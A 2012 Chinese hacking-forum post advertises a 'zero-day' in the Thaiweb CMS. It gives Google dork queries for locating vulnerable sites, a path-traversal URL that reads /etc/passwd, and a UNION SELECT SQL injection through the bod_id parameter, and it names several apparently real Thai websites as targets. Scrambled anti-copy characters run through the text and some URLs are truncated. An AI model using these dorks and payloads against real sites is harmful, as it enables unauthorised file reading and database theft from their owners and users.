找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2066|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:3 G* T' ~; P7 n/ e9 o, B& R1 l) y' I

) s1 |% D) ]; S; V/ n9 _0 \intext:powered by Thaiweb8 K: u5 J: q4 x5 f- d! a! s' A/ l* @
- {3 \& ?5 [( y9 a: f- U! U
inurl:index.php?page=board.php- u' ~4 J( y0 {

  r. _$ S8 J5 R8 a9 w( [
8 m% g! Q" D0 o0 a
" W+ p2 H; }, P: @0 H' n利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
, ]7 a) |! p+ v# k5 l. X
* @1 b. I7 q* }% X* ]1 V3 y- i' M+ C
! j8 g1 j4 g1 }# |: @0 N$ X, g
3 Q* B# x5 [- x6 {  n4 d利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'' k. l' W: S9 J. A9 w

3 _+ E; Y; _* i9 ]/ t! w* t $ g: B  h$ Z. W

: ^" y: H1 A. E* c4 i1 \8 p) f* Shttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--, n& v6 ?9 d. |' A

  q+ W' u5 ?' p4 y% ?7 ^http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
/ Y9 a( j& d. _  }) R7 X, Y 7 N4 z# G# s  k9 k1 [" G
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
9 J4 P. T4 m1 u% s$ y+ Z# w3 t0 g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表